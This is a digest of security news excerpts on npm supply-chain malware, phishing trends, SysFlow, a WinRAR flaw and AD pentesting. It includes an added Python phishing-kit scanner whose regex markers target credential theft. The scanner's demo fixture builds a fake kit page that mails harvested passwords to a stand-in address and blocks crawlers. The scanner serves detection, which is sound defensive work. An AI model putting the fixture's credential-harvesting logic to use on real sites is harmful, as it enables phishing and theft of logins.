CISA warns of trojanized versions of JavaScript library’s NPM package

From hackread.com

On Friday, the US Cybersecurity and Infrastructure Security Agency (CISA) released an alert about an incident documented in the GitHub Advisory Database. According to CISA, crypto-mining malware was hidden in trojanized versions of UAParser.js, a popular JavaScript library distributed through NPM.

The library is downloaded between six and eight million times per week and is used in websites and applications to identify the browser and operating system a visitor is using. The NPM platform became part of Microsoft-owned GitHub in 2020.

Read more…

SysFlow – Cloud-native System Telemetry Pipeline

From kitploit.com

What is SysFlow?

The SysFlow Telemetry Pipeline is a framework for monitoring cloud workloads and for creating performance and security analytics. The goal of the project is to build all the plumbing required for system telemetry so that users can focus on writing and sharing analytics on a scalable, common open-source platform. The backbone of the pipeline is a new data format, SysFlow, which lifts raw system event information into an abstraction that describes process behaviors and their relationships with containers, files, and the network. This object-relational format is highly compact, yet it provides broad visibility into container clouds. The project also provides several APIs that let users process SysFlow with their favorite toolkits. Learn more about SysFlow in the SysFlow specification document.

Read more…

Human Hacking and Multi-Channel Phishing is Surging

From securityboulevard.com


Human hacking is a modern way to think about phishing in its entirety: anything malicious that reaches a user in order to steal credentials, data, or financial information. Treating phishing as only an email problem or a spam problem gives attackers the upper hand. Protecting email while leaving other digital communication channels unprotected lets attackers target your high-value users with greater success. The shift to remote work requires a shift in focus to multi-channel phishing protection. Attackers are capitalizing on the digital channels that remote workers rely on for productivity, such as SMS/text, Slack, LinkedIn, Zoom, Microsoft Teams, Google Meet, and WhatsApp. These channels are less protected and provide an easy way to trick users, steal credentials, and ultimately exfiltrate data from an organization.

Read more…

kit_hunter: basic phishing kit scanner for dedicated and semi-dedicated hosting

From securityonline.info

Kit Hunter is a personal project to learn Python and a basic scanning tool that searches directories and locates phishing kits based on established markers. When detections occur, a report is generated for administrators.

By default, the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.
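To make the marker-based approach described above concrete, here is an added example (not kit_hunter's own code): it walks a directory tree, matches each line of candidate files against a small marker list, and reports the file, the tag that fired and the exact offending line. The marker patterns, the scanned extensions and the sample "kit" files are constructed for the demonstration and are not kit_hunter's tag set or test data.

```python
"""Minimal marker-based phishing-kit scanner.

Illustrative example written for this digest; it is not kit_hunter's code.
The MARKERS below are constructed for the demo and are NOT kit_hunter's tags.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Constructed markers: tag -> case-insensitive regex. A real scanner maintains
# a curated list; these are merely plausible phishing-kit indicators.
MARKERS = {
    # harvested data mailed out of the kit via PHP mail()
    "php-mail-exfil": re.compile(r"\bmail\s*\(\s*\$(?:to|email|recipient)", re.I),
    # a form handler reading a secret from the POST body
    "credential-post": re.compile(
        r"\$_POST\s*\[\s*['\"](?:pass(?:word|wd)?|pin|cvv)['\"]\s*\]", re.I),
    # anti-crawler blocklists that keep scanners away from the kit
    "bot-blocklist": re.compile(r"(?:googlebot|phishtank|netcraft)", re.I),
    # bounce the victim to the real site once credentials are captured
    "redirect-after-harvest": re.compile(
        r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}

# File types worth scanning on a typical web host (constructed list).
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js", ".htaccess", ".txt"}


@dataclass(frozen=True)
class Finding:
    path: str
    tag: str
    lineno: int
    line: str


def scan_file(path, markers=MARKERS):
    """Return one Finding per (line, marker) hit in a single file."""
    findings = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, start=1):
                for tag, pattern in markers.items():
                    if pattern.search(line):
                        findings.append(Finding(path, tag, lineno, line.rstrip("\n")))
    except OSError:
        pass  # unreadable file: skip it rather than abort the whole scan
    return findings


def scan_directory(root, markers=MARKERS, extensions=SCAN_EXTENSIONS):
    """Walk root and scan every file whose extension is in `extensions`."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            # splitext(".htaccess") yields no extension, so fall back to the name
            ext = os.path.splitext(name)[1].lower() or name.lower()
            if ext not in extensions:
                continue
            findings.extend(scan_file(os.path.join(dirpath, name), markers))
    return findings


def format_report(findings, root):
    """Administrator-facing report: file:line [tag] offending code."""
    lines = [f"{len(findings)} suspicious line(s) found under {root}"]
    for f in findings:
        rel = os.path.relpath(f.path, root)
        lines.append(f"{rel}:{f.lineno} [{f.tag}] {f.line.strip()}")
    return "\n".join(lines)


def build_sample_tree():
    """Create a constructed directory: one fake kit plus one benign page."""
    root = tempfile.mkdtemp(prefix="kit_scan_demo_")
    kit = os.path.join(root, "login", "secure")
    os.makedirs(kit)
    with open(os.path.join(kit, "post.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n")
        fh.write("$user = $_POST['username'];\n")
        fh.write("$pass = $_POST['password'];\n")
        fh.write("$to = 'drop@example.invalid';\n")
        fh.write("mail($to, 'Result', \"$user:$pass\");\n")
        fh.write("header('Location: https://bank.example/');\n")
        fh.write("?>\n")
    with open(os.path.join(kit, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write("RewriteEngine On\n")
        fh.write("RewriteCond %{HTTP_USER_AGENT} googlebot [NC,OR]\n")
        fh.write("RewriteCond %{HTTP_USER_AGENT} netcraft [NC]\n")
        fh.write("RewriteRule .* - [F]\n")
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write("<html><body><h1>Welcome</h1></body></html>\n")
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    print(format_report(scan_directory(demo_root), demo_root))
```

Run against a real document root, point `scan_directory` at the host's web directory instead of the constructed tree; every hit shows the line that triggered it so an administrator can triage false positives (a legitimate login form will also read `$_POST['password']`) against genuine kits, where several tags cluster in the same file.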

Read more…

Active Directory Penetration Testing Checklist

From gbhackers.com


This article covers Active Directory penetration testing for penetration testers and security experts who want to secure their networks.

Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. Administrators use it to control domain computers and the services running on every node of the domain.

Active Directory Penetration Testing

This section has several levels; the first is reconnaissance of your network. Any user with an account on the domain controller (DC) can join the domain.

All of this information can be gathered by an ordinary AD user. A username has two parts: the first is the domain name and the second is the account name, like below:

Read more…

New WinRAR Trial Version Vulnerability Let Hackers Execute Arbitrary Code on Windows

From cybersecuritynews.com


A critical vulnerability in the WinRAR file archiver was recently discovered by Positive Technologies researcher Igor Sak-Sakovskiy. The flaw enables attackers to execute arbitrary code on Windows systems.

WinRAR is an application for managing archive files on Windows operating systems. It allows for the creation and unpacking of common archive formats such as RAR and ZIP.

The vulnerability has been assigned CVE-2021-35052 and lies in the component that displays the trial-period expiration notice.

Read more…

Malicious Packages Disguised as JavaScript Libraries Found

From govinfosecurity.com


Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on the npm registry in order to launch cryptominers on Windows, macOS and Linux machines.

An npm registry is a database of JavaScript packages, comprising software and metadata that are used by open-source developers to support JavaScript code sharing.

The researchers reported the malicious packages to npm on Oct. 15, 2021, and npm took them down within hours of their release, the report says.

The researchers at Sonatype have attributed the ownership of the malicious packages to an author whose account is currently deactivated, the report notes.

Read more…